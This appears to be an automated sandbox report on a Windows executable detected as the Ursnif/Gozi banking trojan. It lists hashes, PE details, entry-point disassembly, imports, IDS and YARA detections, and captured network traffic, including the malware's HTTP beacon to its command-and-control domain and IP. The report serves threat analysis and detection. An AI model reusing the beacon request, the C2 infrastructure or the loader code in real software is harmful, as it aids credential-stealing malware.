                                SHA512:67e0a57bfeb122e346d909680b4f99ed1138f42e9c8a74bba7d143de1f6413c94f45000c0c5fd1bc511db0c11bdf668dcc0b5721d0e5df3288d464ed439ac2cc
                                SSDEEP:768:tQLm41fM01vAeyRTwFiCRn7IYbo7gMaBMOF6c629pto:tL41fMSv7ASRnFLMaMOF6c6Y
                                TLSH:6E03E1276AA42D7DFAC345353A21F24207990271833ED5D607B3B47E8523ADF511F792
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x40182f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:1640d668d1471f340cbe565fe63522f6
                                Instruction
                                push esi
                                xor esi, esi
                                push esi
                                push 00400000h
                                push esi
                                call dword ptr [0040203Ch]
                                mov dword ptr [00403160h], eax
                                cmp eax, esi
                                je 00007FCC7CADD247h
                                push esi
                                call dword ptr [00402008h]
                                mov dword ptr [00403170h], eax
                                call dword ptr [00402044h]
                                call 00007FCC7CADCE59h
                                push dword ptr [00403160h]
                                mov esi, eax
                                call dword ptr [00402040h]
                                push esi
                                call dword ptr [00402048h]
                                pop esi
                                push ebp
                                mov ebp, esp
                                sub esp, 0Ch
                                push ebx
                                push esi
                                mov esi, eax
                                mov eax, dword ptr [00403180h]
                                mov ecx, dword ptr [esi+3Ch]
                                mov ecx, dword ptr [ecx+esi+50h]
                                lea edx, dword ptr [eax-69B24F45h]
                                not edx
                                lea ecx, dword ptr [ecx+eax-69B24F45h]
                                push edi
                                and ecx, edx
                                lea edx, dword ptr [ebp-08h]
                                push edx
                                lea edx, dword ptr [ebp-04h]
                                push edx
                                add eax, 964DA0FCh
                                push eax
                                push ecx
                                call 00007FCC7CADD4ADh
                                test eax, eax
                                jne 00007FCC7CADD27Ch
                                mov edi, dword ptr [ebp-04h]
                                push esi
                                push edi
                                call 00007FCC7CADD583h
                                mov ebx, eax
                                test ebx, ebx
                                jne 00007FCC7CADD258h
                                mov esi, dword ptr [edi+3Ch]
                                add esi, edi
                                push esi
                                call 00007FCC7CADCCA4h
                                mov ebx, eax
                                test ebx, ebx
                                jne 00007FCC7CADD247h
                                push edi
                                mov eax, esi
                                call 00007FCC7CADD784h
                                mov ebx, eax
                                test ebx, ebx
                                jne 00007FCC7CADD239h
                                mov esi, dword ptr [esi+28h]
                                push eax
                                push 00000001h
                                add esi, edi
                                push edi
                                call esi
                                test eax, eax
                                jne 00007FCC7CADD22Ah
                                call dword ptr [0000202Ch]
                                Programming Language:
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2008 SP1 build 30729
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x20e80x50.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x10.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xd8.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000xa8.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x10000x1000False0.718017578125data6.515539058364033IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x20000x4c00x600False0.4635416666666667data4.488955985688776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x30000x1940x200False0.056640625data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .bss0x40000x2dc0x400False0.7607421875data6.3016514258390215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x50000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x60000x80000x7200False0.9715254934210527data7.860072145833389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                DLLImport
                                ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv
                                KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                                ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.4194.58.112.17449695802033203 10/26/22-08:31:08.563638TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969580192.168.2.4194.58.112.174
                                192.168.2.4194.58.112.17449695802033204 10/26/22-08:31:08.563638TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969580192.168.2.4194.58.112.174
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 26, 2022 08:31:08.501054049 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.562967062 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.563141108 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.563637972 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625370979 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625478983 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625561953 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625597954 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625643969 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625663042 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625679970 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625698090 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625715971 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625730038 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625850916 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625850916 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:23.624783039 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:23.624878883 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:37.908591032 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:37.970499992 CEST8049695194.58.112.174192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 26, 2022 08:29:48.101234913 CEST5657253192.168.2.48.8.8.8
                                Oct 26, 2022 08:29:48.120796919 CEST53565728.8.8.8192.168.2.4
                                Oct 26, 2022 08:31:08.411577940 CEST5091153192.168.2.48.8.8.8
                                Oct 26, 2022 08:31:08.479096889 CEST53509118.8.8.8192.168.2.4
                                Oct 26, 2022 08:31:28.725523949 CEST5968353192.168.2.48.8.8.8
                                Oct 26, 2022 08:31:28.746222973 CEST53596838.8.8.8192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 26, 2022 08:29:48.101234913 CEST192.168.2.48.8.8.80x415dStandard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:08.411577940 CEST192.168.2.48.8.8.80x70edStandard query (0)siwdmfkshsgw.comA (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:28.725523949 CEST192.168.2.48.8.8.80x1b33Standard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 26, 2022 08:29:48.120796919 CEST8.8.8.8192.168.2.40x415dName error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:08.479096889 CEST8.8.8.8192.168.2.40x70edNo error (0)siwdmfkshsgw.com194.58.112.174A (IP address)IN (0x0001)false
                                Oct 26, 2022 08:31:28.746222973 CEST8.8.8.8192.168.2.40x1b33Name error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false
                                • siwdmfkshsgw.com
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.449695194.58.112.17480C:\Users\user\Desktop\d2ef5.exe
                                TimestampkBytes transferredDirectionData
                                Oct 26, 2022 08:31:08.563637972 CEST93OUTGET /uploaded/pQRddRleZXP/sJg6GhFwZ0qmTC/meZE4SAXFSLuHXPcM_2FX/I4WPB1zBKUN7tcbv/VUX_2BXZPhSScwW/gPk8TGBKaZ5_2FVNf4/DQeVzjyY8/FEmgZVIU8bIRy_2Fy_2B/ldiKoh_2BMRhcwD6rsx/9uRA7vzxbfQ5nCWulzQQLg/RkGHi7DfmhmHl/i8REEpeY/pVP2haL0B_2FgslxWZs9c8a/fbu4j_2B3O/khl76mXAZINveCWsL/tlJp4SNzPxCO/Atw8nEb7TnS/YtJYMZTM8xwnaZ/S9ay0CGGR/2erETTDs/i5PM.pct HTTP/1.1
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                Host: siwdmfkshsgw.com
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 26, 2022 08:31:08.625478983 CEST94INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 26 Oct 2022 06:31:08 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 32 61 35 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 73 69 77 64 6d 66 6b 73 68 73 67 77 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3
                                Data Ascii: 2a5c<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>siwdmfkshsgw.com</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts-content.js')" onerror="window.trackScriptLoad('/head-scripts-content.js', 1)" src="/head-scripts-content.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">
                                Oct 26, 2022 08:31:08.625561953 CEST95INData Raw: d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 20 d0 b2 26 6e 62 73 70 3b 3c 61 20 63 6c 61 73 73 3d 22 62 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 67 2e 72 75 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77
                                Data Ascii: &nbsp;<a class="b-link" href="https://reg.ru" rel="nofollow noopener noreferrer" target="_blank">REG.RU</a></div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosti
                                Oct 26, 2022 08:31:08.625597954 CEST97INData Raw: 74 69 74 6c 65 5f 73 69 7a 65 5f 62 69 67 40 6c 67 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 62 69 67 40 64 65 73 6b 74 6f 70 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 be d0 b7 d0 b4 d0 b0 d0 b9 d1 82 d0 b5 20 d1 81 d0 b0
                                Data Ascii: title_size_big@lg b-title_size_big@desktop b-parking__title"> c REG.RU</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header
                                Oct 26, 2022 08:31:08.625643969 CEST98INData Raw: d0 b5 d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e
                                Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https:
                                Oct 26, 2022 08:31:08.625663042 CEST99INData Raw: 69 77 64 6d 66 6b 73 68 73 67 77 2e 63 6f 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69
                                Data Ascii: iwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
                                Oct 26, 2022 08:31:08.625679970 CEST101INData Raw: 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 20 62 2d 62 75 74 74 6f
                                Data Ascii: b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_build&amp;reg_source=p
                                Oct 26, 2022 08:31:08.625698090 CEST102INData Raw: 73 63 72 69 70 74 69 6f 6e 20 6c 2d 6d 61 72 67 69 6e 5f 74 6f 70 2d 73 6d 61 6c 6c 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 72 6d 61 6c 20 6c 2d 6d 61 72 67 69 6e 5f 74 6f 70 2d 6d 65 64 69 75 6d 40 64 65 73 6b 74 6f 70 20 6c 2d
                                Data Ascii: scription l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL- &nbsp; &nbsp;
                                Oct 26, 2022 08:31:08.625715971 CEST103INData Raw: 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 65 61 64 20 20 20 3d 20 64 6f 63 75 6d 65
                                Data Ascii: var script = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=siwdmfkshsgw.com&rand=' + Math.random() + '&c
                                Oct 26, 2022 08:31:08.625730038 CEST104INData Raw: 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 33 38 30 39 30 39 2d 32 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75
                                Data Ascii: new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date();k=e.createEle


                                Click to jump to process

                                Click to jump to process

                                Target ID:0
                                Start time:08:29:42
                                Start date:26/10/2022
                                Path:C:\Users\user\Desktop\d2ef5.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\d2ef5.exe
                                Imagebase:0x400000
                                File size:37888 bytes
                                MD5 hash:1D8A445BEF0C0D4A7EC519F06C23224A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:52.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:47.4%
                                  Total number of Nodes:114
                                  Total number of Limit Nodes:13
